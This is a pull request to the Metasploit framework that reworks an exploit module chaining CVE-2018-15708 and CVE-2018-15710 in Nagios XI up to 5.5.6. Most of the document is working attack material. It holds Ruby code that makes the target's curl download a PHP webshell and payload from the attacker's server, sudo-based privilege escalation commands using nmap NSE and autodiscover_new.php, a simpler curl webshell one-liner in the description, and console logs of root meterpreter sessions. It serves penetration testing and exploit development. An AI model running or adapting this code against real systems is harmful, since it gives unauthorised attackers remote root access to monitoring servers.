### PR TITLE
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_magpie_debug.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_magpie_debug.md
@@ -1,116 +1,100 @@
 ## Vulnerable Application
 
-Nagios XI 5.5.6 Root Remote Code Execution
+This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
+CVE-2018-15708 which allows for unauthenticated remote code execution
+and CVE-2018-15710 which allows for local privilege escalation.
+When combined, these two vulnerabilities allow execution of arbitrary
+commands as root.
 
 The exploit works as follows:
 
 - A local HTTPS server is setup. When it is reached, this server responds with a payload.
-- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
-- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.
-
-# Creating A Testing Environment
-
-- Install a Ubuntu Linux LTS (I used 18.04 LTS for my tests) in a VM.
-- Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
-- Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
+- By crafting a malicious request, we make the target host send a request to our HTTPS server.
+  - The local HTTPS server must be reachable from the Nagios host.
+  - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
+- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
+- A command is executed via the webshell. This command elevates privileges and runs the payload executable.
 
 ## Verification Steps
 
-1. `use exploit/linux/http/nagios_xi_root_rce`
-2. `set RHOSTS [IP]`
-3. `set RSRVHOST [IP]`
-4. `exploit`
+Download a vulnerable version of the Nagios XI virtual appliance:
 
-A meterpreter session should have been opened successfully and you should be root
+* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova
+* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.13-64.ova
+* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.0-64.ova
+* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.6-64.ova
+
+Or download a [vulnerable application installer](https://www.nagios.com/downloads/nagios-xi/older-releases/) and follow the
+[installation instructions](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
+
+Metasploit:
+
+1. `msfconsole`
+1. `use exploit/linux/http/nagios_xi_magpie_debug`
+1. `set RHOSTS [IP]`
+1. `set RSRVHOST [IP]`
+1. `exploit`
+1. You should get a new session with *root* privileges
 
 ## Options
 
-## RSRVHOST
+### RSRVHOST
 
-IP at which your local HTTPS can be reached. Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).
+IP address at which the local HTTPS server can be reached.
+Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).
 
-## RSRVPORT
+### RSRVPORT
 
-Port that will forward to your local HTTPS server.
-
-## SRVHOST
-
-IP of your local HTTPS server (must be a local IP).
-
-## SRVPORT
-
-Port to listen to for your local HTTPS server.
+Port at which the local HTTPS server can be reached.
 
 ## Scenarios
 
-## Nagios 5.5.6 on Ubuntu 18.04 LTS
+## NagiosXI 5.5.6 (x64) virtual appliance
 
 ```
-msf5 exploit(linux/http/nagios_xi_magpie_debug) > show options
-
-Module options (exploit/linux/http/nagios_xi_magpie_debug):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   HTTPDELAY  5                no        Number of seconds the web server will wait before termination
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     172.16.135.129   yes       The target address range or CIDR identifier
-   RPORT      443              yes       The target port (TCP)
-   RSRVHOST   172.16.135.1     yes       A public IP at which your host can be reached (e.g. your router IP)
-   RSRVPORT   8080             yes       The port that will forward to the local HTTPS server
-   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
-   SRVPORT    8080             yes       The local port to listen on.
-   SSL        true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   VHOST                       no        HTTP server virtual host
-
-
-Payload options (linux/x86/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  172.16.135.1     yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Nagios XI 5.5.6
-
-
-msf5 exploit(linux/http/nagios_xi_magpie_debug) > run
+msf6 > use exploit/linux/http/nagios_xi_magpie_debug
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_magpie_debug) > set rhosts 10.1.1.113
+rhosts => 10.1.1.113
+msf6 exploit(linux/http/nagios_xi_magpie_debug) > set rsrvhost 10.1.1.114
+rsrvhost => 10.1.1.114
+msf6 exploit(linux/http/nagios_xi_magpie_debug) > run
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.
 
-[*] Started reverse TCP handler on 172.16.135.1:4444 
-msf5 exploit(linux/http/nagios_xi_magpie_debug) > [*] Using URL: https://0.0.0.0:8080/ixFonv2
-[*] Local IP: https://192.168.0.21:8080/ixFonv2
+[*] Started reverse TCP handler on 10.1.1.114:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Found MagpieRSS.
+[*] Using URL: https://0.0.0.0:8080/iRtxnl8L
+[*] Local IP: https://10.1.1.114:8080/iRtxnl8L
 [*] Server started.
-[*] nZOnJhGnMb.php uploaded with success!
-[*] Using URL: https://0.0.0.0:8080/mTwEwHtAuz0V
-[*] Local IP: https://192.168.0.21:8080/mTwEwHtAuz0V
+[*] Uploading to /usr/local/nagvis/share/fbHGUhauqtV.php ...
+[+] fbHGUhauqtV.php uploaded successfully!
+[*] Using URL: https://0.0.0.0:8080/YvyES7YlFee8R
+[*] Local IP: https://10.1.1.114:8080/YvyES7YlFee8R
 [*] Server started.
-[*] SQmBobwBzw uploaded with success!
-[*] Sending stage (985320 bytes) to 172.16.135.129
-[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:33090) at 2019-06-25 16:13:01 -0500
-[+] Deleted /usr/local/nagvis/share/nZOnJhGnMb.php
-[+] Deleted /usr/local/nagvis/share/SQmBobwBzw
-[!] This exploit may require manual cleanup of '/var/tmp/mtrhbwFZHa.nse' on the target
+[*] Uploading to /usr/local/nagvis/share/nYRTioXKBam ...
+[+] nYRTioXKBam uploaded successfully!
+[*] Checking PHP web shell: /nagvis/fbHGUhauqtV.php
+[+] Success! Commands executed as user: uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+[*] Attempting privilege escalation ...
+[*] Sending stage (3008420 bytes) to 10.1.1.113
+[*] Meterpreter session 1 opened (10.1.1.114:4444 -> 10.1.1.113:42314) at 2021-03-16 02:58:20 -0400
+[+] Deleted /usr/local/nagvis/share/fbHGUhauqtV.php
+[+] Deleted /usr/local/nagvis/share/nYRTioXKBam
+[!] This exploit may require manual cleanup of '/var/tmp/hRyNmrQHZAq.nse' on the target
 [*] Server stopped.
 
-msf5 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
+msf6 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
 [*] Starting interaction with 1...
 
 meterpreter > getuid
-Server username: uid=0, gid=0, euid=0, egid=0
+Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
 meterpreter > sysinfo
-Computer     : 172.16.135.129
-OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+Computer     : localhost.localdomain
+OS           : CentOS 7.5.1804 (Linux 3.10.0-862.14.4.el7.x86_64)
 Architecture : x64
-BuildTuple   : i486-linux-musl
-Meterpreter  : x86/linux
-meterpreter > 
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/modules/exploits/linux/http/nagios_xi_magpie_debug.rb
+++ b/modules/exploits/linux/http/nagios_xi_magpie_debug.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -11,130 +10,182 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer::HTML
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => "Nagios XI Magpie_debug.php Root Remote Code Execution",
-      'Description'    => %q{
-         This module exploits two vulnerabilities in Nagios XI 5.5.6:
-         CVE-2018-15708 which allows for unauthenticated remote code execution
-         and CVE 2018-15710 which allows for local privilege escalation.
-         When combined, these two vulnerabilities give us a root reverse shell.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Chris Lyne (@lynerc)', # First working exploit
-          'Guillaume André (@yaumn_)' # Metasploit module
-        ],
-      'References'     =>
-        [
-          ['CVE', '2018-15708'],
-          ['CVE', '2018-15710'],
-          ['EDB', '46221'],
-          ['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
-          ['URL', 'https://www.tenable.com/security/research/tra-2018-37']
-        ],
-      'Platform'       => 'linux',
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'Targets'        =>
-        [
-          ['Nagios XI 5.5.6', version: Rex::Version.new('5.5.6')]
-        ],
-      'DefaultOptions' =>
-        {
-          'RPORT' => 443,
-          'SSL' => true
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI Magpie_debug.php Root Remote Code Execution',
+        'Description' => %q{
+          This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
+          CVE-2018-15708 which allows for unauthenticated remote code execution
+          and CVE-2018-15710 which allows for local privilege escalation.
+          When combined, these two vulnerabilities allow execution of arbitrary
+          commands as root.
         },
-      'Privileged'     => false,
-      'DisclosureDate' => "2018-11-14",
-      'DefaultTarget'  => 0
-     ))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Chris Lyne (@lynerc)', # Discovery and exploit
+            'Guillaume André (@yaumn_)', # Metasploit module
+            'bcoles', # Additional writable paths and usability/reliability/cleanup fixes
+          ],
+        'References' =>
+          [
+            ['CVE', '2018-15708'],
+            ['CVE', '2018-15710'],
+            ['EDB', '46221'],
+            ['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
+            ['URL', 'https://www.tenable.com/security/research/tra-2018-37']
+          ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' =>
+          [
+            ['Nagios XI <= 5.5.6', { version: Gem::Version.new('5.5.6') }]
+          ],
+        'DefaultOptions' =>
+          {
+            'RPORT' => 443,
+            'SSL' => true
+          },
+        'Privileged' => true,
+        'DisclosureDate' => '2018-11-14',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
 
-    register_options(
-      [
-        OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
-        OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
-        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 5])
-      ])
+    register_options([
+      OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
+      OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
+      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
+    ])
 
     @WRITABLE_PATHS = [
+      # writable as 'apache' user
       ['/usr/local/nagvis/share', '/nagvis'],
-      ['/var/www/html/nagiosql',  '/nagiosql']
+      # writable as 'apache' user
+      ['/var/www/html/nagiosql', '/nagiosql'],
+      # writable as 'nagios' group
+      ['/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs', '/nagiosxi/includes/components/autodiscovery/jobs'],
+      # writable as 'nagios' group
+      ['/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp', '/nagiosxi/includes/components/highcharts/exporting-server/temp'],
     ]
     @writable_path_index = 0
-    @MAGPIERSS_PATH = '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
-    @session_opened = false
-    @webshell_name = "#{Rex::Text.rand_text_alpha(10)}.php"
-    @nse_name = "#{Rex::Text.rand_text_alpha(10)}.nse"
-    @meterpreter_name = Rex::Text.rand_text_alpha(10)
+    @webshell_name = "#{Rex::Text.rand_text_alpha(10..12)}.php"
+    @meterpreter_name = Rex::Text.rand_text_alpha(10..12)
   end
 
-  def on_request_uri(cli, req)
+  def on_request_uri(cli, _req)
     if @current_payload == @webshell_name
-      send_response(cli, '<?php system($_GET[\'cmd\'])?>')
+      send_response(cli, "<?php system($_GET['cmd'])?>")
     else
       send_response(cli, generate_payload_exe)
     end
   end
 
   def primer
-    res = send_request_cgi(
-      {
-        'method'  => 'GET',
-        'uri'     => normalize_uri(@MAGPIERSS_PATH),
-        'vars_get' => {
-          'url' => "https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} " +
-          '-o ' + @WRITABLE_PATHS[@writable_path_index][0] + "/#{@current_payload}"
-        }
-      }, 5)
+    path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@current_payload}"
+    print_status("Uploading to #{path} ...")
+    res = magpie_debug("https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} -o '#{path}'")
 
-    if !res || res.code != 200
-      print_error('Couldn\'t send malicious request to target.')
+    unless res
+      print_error("Could not upload #{@current_payload} to target. No reply.")
+      return false
     end
- end
 
-  def check_upload
+    unless res.code == 200
+      print_error("Could not upload #{@current_payload} to target. Unexpected reply (HTTP #{res.code}).")
+      return false
+    end
+
+    if res.body.include?('Error: MagpieRSS: Failed to fetch')
+      print_error("Could not upload #{@current_payload} to target. cURL failed to download the file from our server.")
+      return false
+    end
+
+    register_file_for_cleanup(path)
+  end
+
+  def upload_success?
     res = send_request_cgi(
       {
         'method' => 'GET',
-        'uri'    => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
-      }, 5)
-    if res && res.code == 200
-      print_status("#{@current_payload} uploaded with success!")
-      return true
-    else
-      print_error("Couldn't upload #{@current_payload}.")
+        'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
+      }, 5
+    )
+
+    unless res
+      print_error("Could not access #{@current_payload}. No reply.")
       return false
     end
+
+    unless res.code == 200
+      print_error("Could not access #{@current_payload}. Unexpected reply (HTTP #{res.code}).")
+      return false
+    end
+
+    print_good("#{@current_payload} uploaded successfully!")
+    true
+  end
+
+  def magpie_debug(url = '')
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri('/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'),
+        'vars_get' => {
+          'url' => url
+        }
+      }, 5
+    )
   end
 
   def check
-    res = send_request_cgi(
-      {
-        'method'  => 'GET',
-        'uri'     => normalize_uri(@MAGPIERSS_PATH)
-      }, 5)
+    res = magpie_debug
 
-    if res && res.code == 200
-      return Exploit::CheckCode::Appears
-    else
-      return Exploit::CheckCode::Safe
+    unless res
+      return CheckCode::Safe('No reply.')
     end
+
+    if res.code == 200 && res.body.include?('MagpieRSS')
+      return CheckCode::Appears('Found MagpieRSS.')
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi(
+      {
+        'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
+        'method' => 'GET',
+        'vars_get' => {
+          'cmd' => cmd
+        }
+      }, 5
+    )
   end
 
   def exploit
     all_files_uploaded = false
 
-    # Upload useful files on the target
-    for i in 0..@WRITABLE_PATHS.size
+    # Upload PHP web shell and meterpreter to writable directory on target
+    for i in 0...@WRITABLE_PATHS.size
       @writable_path_index = i
       for filename in [@webshell_name, @meterpreter_name]
         @current_payload = filename
         begin
           Timeout.timeout(datastore['HTTPDELAY']) { super }
         rescue Timeout::Error
-          if !check_upload
+          if !upload_success?
             break
           elsif filename == @meterpreter_name
             all_files_uploaded = true
@@ -146,38 +197,50 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
+    unless all_files_uploaded
+      fail_with(Failure::NotVulnerable, 'Uploading payload failed')
+    end
+
     meterpreter_path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@meterpreter_name}"
 
-    register_file_for_cleanup(
-      "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@webshell_name}",
-      meterpreter_path,
-      "/var/tmp/#{@nse_name}"
-    )
+    print_status("Checking PHP web shell: #{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}")
+
+    res = execute_command('id')
+    unless res && res.body.include?('uid=')
+      fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
+    end
+
+    id = res.body.scan(/^(uid=.+)$/).flatten.first
+    if id.blank?
+      fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
+    end
+    print_good("Success! Commands executed as user: #{id}")
+
+    print_status('Attempting privilege escalation ...')
+
+    nse_path = "/var/tmp/#{Rex::Text.rand_text_alpha(10..12)}.nse"
+    register_file_for_cleanup(nse_path)
 
     # Commands to escalate privileges, some will work and others won't
     # depending on the Nagios version
     cmds = [
       "chmod +x #{meterpreter_path} && sudo php /usr/local/nagiosxi/html/includes/" \
       "components/autodiscovery/scripts/autodiscover_new.php --addresses=\'127.0.0.1/1`#{meterpreter_path}`\'",
-      "echo 'os.execute(\"#{meterpreter_path}\")' > /var/tmp/#{@nse_name} " \
-      "&& sudo nmap --script /var/tmp/#{@nse_name}"
-   ]
+      "echo 'os.execute(\"#{meterpreter_path}\")' > #{nse_path} " \
+      "&& sudo nmap --script #{nse_path}"
+    ]
 
     # Try to launch root shell
     for cmd in cmds
-      res = send_request_cgi(
-        {
-          'uri'     => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
-          'method'  => 'GET',
-          'vars_get' => {
-            'cmd' => cmd
-          }
-        }, 5)
+      vprint_status("Trying: #{cmd}")
+      execute_command(cmd)
+      break if session_created?
+    end
 
-      if !res && session_created?
-        break
-      end
-      print_status('Couldn\'t get remote root shell, trying another method')
+    unless session_created?
+      print_error('Privilege escalation failed')
+      print_status("Executing payload as #{id} ...")
+      execute_command("chmod +x #{meterpreter_path} && #{meterpreter_path}")
     end
   end
 end


### PR DESCRIPTION
* Add AutoCheck

The module now supports `AutoCheck`.

---

* Resolve Rubocop violations

There are still two violations which I'm not going to fix.

The module uses a HTTPS server and invokes `super` from within the `exploit` method for each file upload attempt, several layers deep in a `begin` / `rescue` block (using timeouts), which requires using instance variables to track state. This is cute, but entirely unnecessary, and Rubocop rightly warns that the complexity is too high.

This approach adds unnecessary complexity and makes the code harder to read code, resulting in 2 bugs (at least), one of which was not immediately obvious from code review. This also spams console with server start/stop messages, as the server is started and stopped for each upload attempt, which is unnecessary. This also prevents the user from killing execution with CTRL+C until the module has completed.

There's also a waaaaay easier way to exploit this by writing debug info to file:

```
curl -v 'https://127.0.0.1/' -H 'asdf: <?php system($_REQUEST[cmd]); ?>' --stderr shell.php
```

This entirely removes the requirement to run the local HTTPS server, which is a vastly more simplistic approach (and thus less error prone), does not leave the Metasploit HTTPS server IP address in the `url` paramater for the `magpie_debug.php` access logs, does not require network egress, does not require port forwarding if the Metasploit host is NATed, and does not fail when the version of curl+SSL on the target is too old to connect to Metasploit's HTTPS server.

Fixing this mess requires fundamentally reworking the module architecture, at which point the changes would effectively be a rewrite. I'm not doing this.

---

* Fix off-by-one in array index triggered when no file upload succeeds

An off-by-one error occurred due to use of `..` rather than `...`. The loop was used to increment an integer which was later used as an array index, resulting in the following unintuitive error when all file upload attempts failed and the module tries to access the next index (which is invalid).

```

msf6 exploit(linux/http/nagios_xi_magpie_debug) > [*] Using URL: https://0.0.0.0:8080/fECk0BD
[*] Local IP: https://10.1.1.105:8080/fECk0BD
[*] Server started.
[-] Couldn't upload KbZInXeGFo.php.
[*] Using URL: https://0.0.0.0:8080/Ut5MP4ds
[*] Local IP: https://10.1.1.105:8080/Ut5MP4ds
[*] Server started.
[-] Couldn't upload KbZInXeGFo.php.
[*] Using URL: https://0.0.0.0:8080/3sahWQ
[*] Local IP: https://10.1.1.105:8080/3sahWQ
[*] Server started.
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Server stopped.
```

---

* Fix cleanup: ensure files are removed when upload succeeds but execution fails

Due to the incomprehensible architectural madness and failure to account for real world conditions, the module left behind artifacts when upload succeeded but the file was not accessible. This scenario occurs on default out-of-the-box NagiosXI virtual appliance installations, as some (or all) directories targeted for writing the payload result in a 401 or 403 error when accessed via the web server.

---

* Add module notes

---

* Add error handling and associated operator feedback

The module offered little in the way of error handling and limited operator feedback. This PR adds various error checks and associated error messages to give the operator appropriate feedback.

---

* Add additional writable paths required for some old Nagios versions

On some versions of Nagios, the payload files can be uploaded successfully but not accessed via the web server. This PR adds two new paths which work on these versions. For example, the following output shows attempts to access the two existing paths failed, but exploitation was successful using one of the new paths.

```
msf6 exploit(linux/http/nagios_xi_magpie_debug) > run
[*] Exploit running as background job 77.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.1.1.105:4444 
[*] Executing automatic check (disable AutoCheck to override)
msf6 exploit(linux/http/nagios_xi_magpie_debug) > [+] The target appears to be vulnerable. Found MagpieRSS.
[*] Using URL: https://0.0.0.0:8080/faNVHF6Gti9
[*] Local IP: https://10.1.1.105:8080/faNVHF6Gti9
[*] Server started.
[*] Uploading to /usr/local/nagvis/share/YkeWXmMeIlU.php ...
[-] Could not access YkeWXmMeIlU.php. Unexpected reply (HTTP 401).
[*] Using URL: https://0.0.0.0:8080/npJveRrW
[*] Local IP: https://10.1.1.105:8080/npJveRrW
[*] Server started.
[*] Uploading to /var/www/html/nagiosql/YkeWXmMeIlU.php ...
[-] Could not access YkeWXmMeIlU.php. Unexpected reply (HTTP 403).
[*] Using URL: https://0.0.0.0:8080/d7Sa0THbK
[*] Local IP: https://10.1.1.105:8080/d7Sa0THbK
[*] Server started.
[*] Uploading to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/YkeWXmMeIlU.php ...
[+] YkeWXmMeIlU.php uploaded successfully!
[*] Using URL: https://0.0.0.0:8080/3QStX1F
[*] Local IP: https://10.1.1.105:8080/3QStX1F
[*] Server started.
[*] Uploading to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/sUzWsydXLt ...
[+] sUzWsydXLt uploaded successfully!
[*] Checking PHP web shell: /nagiosxi/includes/components/autodiscovery/jobs/YkeWXmMeIlU.php
[+] Success! Commands executed as user: uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
[*] Attempting privilege escalation ...
[*] Trying: chmod +x /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/sUzWsydXLt && sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/sUzWsydXLt`'
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 10.1.1.108
[*] Meterpreter session 25 opened (10.1.1.105:4444 -> 10.1.1.108:57042) at 2021-02-15 05:58:42 -0500
[+] Deleted /usr/local/nagvis/share/YkeWXmMeIlU.php
[+] Deleted /var/www/html/nagiosql/YkeWXmMeIlU.php
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/YkeWXmMeIlU.php
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/sUzWsydXLt

msf6 exploit(linux/http/nagios_xi_magpie_debug) > 
[!] This exploit may require manual cleanup of '/var/tmp/JPzFABbSVp.nse' on the target
[*] Server stopped.

msf6 exploit(linux/http/nagios_xi_magpie_debug) > 
```

---

* Add fallback to session as `apache` if privilege escalation fails

Privilege escalation will fail if the `sudo` config has been modified, resulting in no session. This PR ensures at least a low-privilege session as the `apache` user is obtained.

---

* Update documentation in line with above changes and fix software download links

Added links to virtual appliances. Some old virtual appliances have been removed from the website, while many can still be accessed using the correct direct link. These versions are no longer linked anywhere on the main website.
